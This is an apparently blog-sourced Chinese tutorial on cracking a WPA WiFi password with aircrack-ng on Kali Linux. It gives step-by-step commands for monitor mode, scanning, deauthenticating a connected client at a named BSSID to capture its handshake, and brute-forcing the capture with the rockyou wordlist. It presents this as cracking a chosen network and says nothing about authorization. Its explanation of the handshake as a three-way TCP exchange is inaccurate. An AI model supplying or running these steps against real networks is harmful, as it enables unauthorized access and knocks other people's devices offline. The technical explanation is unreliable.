1.第一步將網卡掛載到虛擬機中:
按下圖操作即可下圖所示
然后打開終端輸入:ifconfig,如下出現wlan0,表示掛載成功
2.打開kail的無線攻擊功能:
3.查看各接口的狀態:
airmon-ng
如果你的網卡本身支持監聽功能就好。
如果像我一樣顯卡的芯片是rtl8188eu本身不支持監聽功能的,那么很可能你的PHY欄會顯示null,那么后面想監聽wifi是不可能的,解決方法只有重新編譯驅動,請參考我這篇文章
4.檢查影響aircrack-ng的進程
當我們將網卡置於monitor模式的時候,會自動地檢查影響aircrack-ng的進程。也可以通過以下命令手動檢查:
airmon-ng check
5.殺死影響aircrack-ng的進程
以下命令會停掉network managers然后殺死所有影響aircrack-ng的進程:
airmon-ng check kill
6.開啟monitor模式
airmon-ng start wlan0
我的是上面這樣,雖然名字沒有改成wlan0mon但是也可以用,可能和我的網卡有關系,本身rtl8188eu就是不支持的。
如果網卡本身支持,正常情況下是這樣,會出現wlan0mon或者mon
7.監聽周邊wifi:
airodump-ng wlan0 # 你的后面有mon就跟寫上mon
BSSID為wifi的MAC地址,PWR為信號強弱程度,數值越小信號越強;#DATA為數據量,越大使用的人就越多,CH為信道頻率(頻道),ESSID為wifi的名稱,中文可能會有亂碼
8.對你要破解的wifi進行抓包,以第一個wifi為例子
sudo airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home/answer/aaa/a1/a1 wlan0
格式:airodump-ng --bssid BSSID -c 信道頻率 -w 抓包存儲的路徑 wlan0mon
9.通常只是第8步很難抓到包,所以需要對已連接的終端進行攻擊,使它掉線重連,以此來獲取數據包。
通過上面的圖片和一看到,有三個正在連接的終端,選一個信號最強的也就是PWR是-76的,以此為例,重新打開一個終端輸入如下:
aireplay-ng -0 2 -a BC:5F:6F:3D:03:74 -c B8:37:65:94:5D:13 wlan0
(0 WiFi設備無限次數,-0 2則攻擊2次。攻擊原理是:先讓設備掉線,設備會再自動連接,並發這個自動連接過程會進行三次握手,會發送tcp包(里面包含加密的密碼數據),我方偽裝成WiFi熱點去竊取該數據包。我方竊取后即可用字典窮舉法暴力破解加密的WiFi密碼,數據包里面的密碼是哈希加密的,哈希加密只能正向)
10.當第8步中的終端出現WPA handshake時,表示抓包成功
兩個終端都按Ctrl+c停止,不然那邊會一直斷網的
cd打開抓包的目錄,ls列出來,就看到我們抓到的數據包
11.字典解密
解壓kail中自帶的字典,在/usr/share/wordlists/
有很多,最大的是rockyou.txt.gz,解壓后大約160m
解壓命令:
gzip -d/usr/share/wordlists/rockyou.txt.gz # 或者 # zcat rockyou.txt.gz > r.txt # 新建一個txt文件
最后,進行字典破解cap文件:
aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-0.1.cap
漫長只等待,在這個過程中,就不需要網卡了,只是離線破解,所以網卡可以該干嘛干嘛就行,重啟network-manager命令是:service network-manager start